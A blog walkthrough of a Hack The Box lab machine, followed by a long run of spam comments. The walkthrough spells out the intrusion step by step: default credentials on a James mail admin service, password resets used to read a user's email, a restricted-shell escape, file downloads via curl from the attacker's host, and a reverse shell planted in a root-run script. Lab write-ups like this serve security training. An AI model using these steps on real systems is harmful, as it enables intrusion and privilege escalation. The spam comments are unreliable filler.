Note: In an attempt to be OSCP friendly, NONE of my write ups will utilize Metasploit. Zero. Zip. Tell your friends.
Let’s see what our first couple of nmap scans come up with: nmap -p – 10.10.10.51 and then nmap -sC -sV -p 22,25,80,110,119,4555 10.10.10.51
A few things look interesting. To start with, port 80 is open so we can probably navigate to that web page. Also, port 4555 is running some service called james-admin. No idea what James is, but we’ll figure it out.
Let’s navigate to the webpage first.
Clinking on links within the website everything appears to come up as a .html, which isn’t super interesting right away (.php is usually more vulnerable).
Let’s see if we can get into that port 4555 using netcat: nc 10.10.10.51 4555
It’s asking for a username and a password, and a quick Google search shows us that the default credentials are root/root, so let’s try that.
That was easy enough. From here I can do a few things, like listusers and even setpassword thus changing any user’s password and then logging in as them. Let’s run listusers:
Checking Email with Telnet
There’s a few ways to read the e-mail on this device. You could use a client like Thunderbird, but I’m gonnna use Telnet. You can find information on that here: https://mediatemple.net/community/products/dv/204404584/sending-or-viewing-emails-using-telnet
We’ll open up a new terminal window and then log into the mailadmin account via telnet on port 110. We type USER mailadmin, PASS password, and LIST to view the contents of the inbox:
And it doesn’t look like there’s anything in there. Let’s try mindy’s account now, so go change her password
And then check if there’s anything in her inbox:
Looks like there is two items. We can use the RETR command (for retreive) to view each of the e-mails:
And it looks like we have some SSH credentials in the 2nd e-mail, nice! So let’s SSH into the box this way with the following command: ssh mindy@10.10.10.51
We have a shell, but there isn’t much we can do with it since it’s restricted:
If we cat /etc/passwd we can see that the mindy user has a default bash of rbash, which is a restricted bash shell.
You can do some Googling to find various ways to get past a restricted bash, and it all depends on what kind of characters are available to be executed, such as the /. In our case, we can re-start our SSH session with the following command: ssh mindy@10.10.10.51 “bash –noprofile” to bypass the loading of the profile. More information is available here: https://speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells?slide=9
From here, viewing the user.txt flag is trivial.
Privledge Escelation
We’re going to try to enumerate the Linux box now. We’ll do that with LinEnum.sh, available here: https://github.com/rebootuser/LinEnum
You’ll want to download it to your Kali box, and then setup the simple HTTP server so you can easily transfer the file to the target machine. Download the LinEnum.sh script and then from the directory it is in, run python -m SimpleHTTPServer 80
Now, from our shell on our target box, we’ll type curl 10.10.14.30/LinEnum.sh -o LinEnum.sh
And we now see we have the file on our target machine. Time to execute: bash LinEnum.sh -t
There is a lot to look at in the contents of what we just enumerated, to the point of it being overwealming. One thing should stand out, though:
So this is a file that we can write to, but executes as root, and it’s a Python script. Let’s navigate there and look at it.
Using Vi or Nano in a shell is a bitch (at least for me) so the easiest way I was able to do this was create a new tmp.py file on my Kali box, and paste the Python Reverse Shell code from the PenTest Monkey cheat sheet here: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet making sure to update it with my IP address.
Now, look at the above code carefully, we had to tweak it slightly from what was exactly on the PenTest Monkey website.
Then, setup a NetCat listener on your Kali box with the command nc -lvp 1234 and then use Curl (like we did earlier) to copy your new tmp.py file to the /opt directory on your target machine: curl 10.10.14.30/tmp.py -o tmp.py
Now, let’s test our script first. From our target machine’s shell, type python tmp.py
If your script worked, you should have a reverse shell with mindy’s credentials:
That will verify that your script works. Kill that NetCat session, start a new one, and then wait for the tmp.py script to execut as the root user.
Good V I should definitely pronounce, impressed with your site. I had no trouble navigating through all tabs as well as related information ended up being truly easy to do to access. I recently found what I hoped for before you know it in the least. Reasonably unusual. Is likely to appreciate it for those who add forums or something, web site theme . a tones way for your customer to communicate. Excellent task..
You really make it appear so easy together with your presentation however I find this topic to be really one thing that I believe I’d by no means understand. It seems too complex and extremely broad for me. I’m taking a look ahead for your subsequent put up, I?¦ll try to get the cling of it!
me encantei com este site. Pra saber mais detalhes acesse nosso site e descubra mais. Todas as informações contidas são conteúdos relevantes e diferentes. Tudo que você precisa saber está ta lá.
fantástico este conteúdo. Gostei muito. Aproveitem e vejam este conteúdo. informações, novidades e muito mais. Não deixem de acessar para aprender mais. Obrigado a todos e até mais. 🙂
I?¦ll right away grab your rss feed as I can not to find your email subscription link or newsletter service. Do you have any? Please let me know in order that I may just subscribe. Thanks.
Thanks for all of the hard work on this web site. Debby enjoys making time for investigations and it is obvious why. Most people know all of the lively mode you offer very useful guides through your blog and in addition cause participation from people on the article then our simple princess is starting to learn a lot of things. Have fun with the remaining portion of the year. You have been conducting a superb job.
Good – I should definitely pronounce, impressed with your website. I had no trouble navigating through all the tabs as well as related info ended up being truly simple to do to access. I recently found what I hoped for before you know it at all. Quite unusual. Is likely to appreciate it for those who add forums or something, site theme . a tones way for your client to communicate. Excellent task.
Thank you for the sensible critique. Me and my neighbor were just preparing to do some research about this. We got a grab a book from our area library but I think I learned more from this post. I’m very glad to see such wonderful info being shared freely out there.
I like this website very much, Its a real nice spot to read and incur information.
Heya! I just wanted to ask if you ever have any trouble with hackers? My last blog (wordpress) was hacked and I ended up losing many months of hard work due to no data backup. Do you have any solutions to stop hackers?
This web site is mostly a walk-through for all of the information you wanted about this and didn’t know who to ask. Glimpse right here, and also you’ll positively discover it.
Great line up. We will be linking to this great article on our site. Keep up the good writing.
WONDERFUL Post.thanks for share..extra wait .. …
You made some nice points there. I looked on the internet for the subject and found most guys will approve with your blog.
There is noticeably a bundle to know about this. I assume you made certain nice points in features also.
Hello I am so delighted I found your weblog, I really found you by error, while I was browsing on Aol for something else, Anyways I am here now and would just like to say kudos for a tremendous post and a all round entertaining blog (I also love the theme/design), I don’t have time to browse it all at the minute but I have saved it and also added in your RSS feeds, so when I have time I will be back to read much more, Please do keep up the fantastic job.
Hi , I do believe this is an excellent blog. I stumbled upon it on Yahoo , i will come back once again. Money and freedom is the best way to change, may you be rich and help other people.
Thank you a lot for sharing this with all people you actually know what you are talking approximately! Bookmarked. Kindly additionally seek advice from my website =). We could have a hyperlink exchange agreement among us!
ke4m22
Terrific work! This is the type of info that should be shared around the web. Shame on Google for not positioning this post higher! Come on over and visit my website . Thanks =)
I got what you intend, regards for posting.Woh I am thankful to find this website through google. “Wisdom doesn’t necessarily come with age. Sometimes age just shows up by itself.” by Woodrow Wilson.
Thank you for the sensible critique. Me & my neighbor were just preparing to do a little research on this. We got a grab a book from our local library but I think I learned more from this post. I am very glad to see such wonderful info being shared freely out there.
I would like to thnkx for the efforts you have put in writing this blog. I am hoping the same high-grade blog post from you in the upcoming as well. In fact your creative writing abilities has inspired me to get my own blog now. Really the blogging is spreading its wings quickly. Your write up is a good example of it.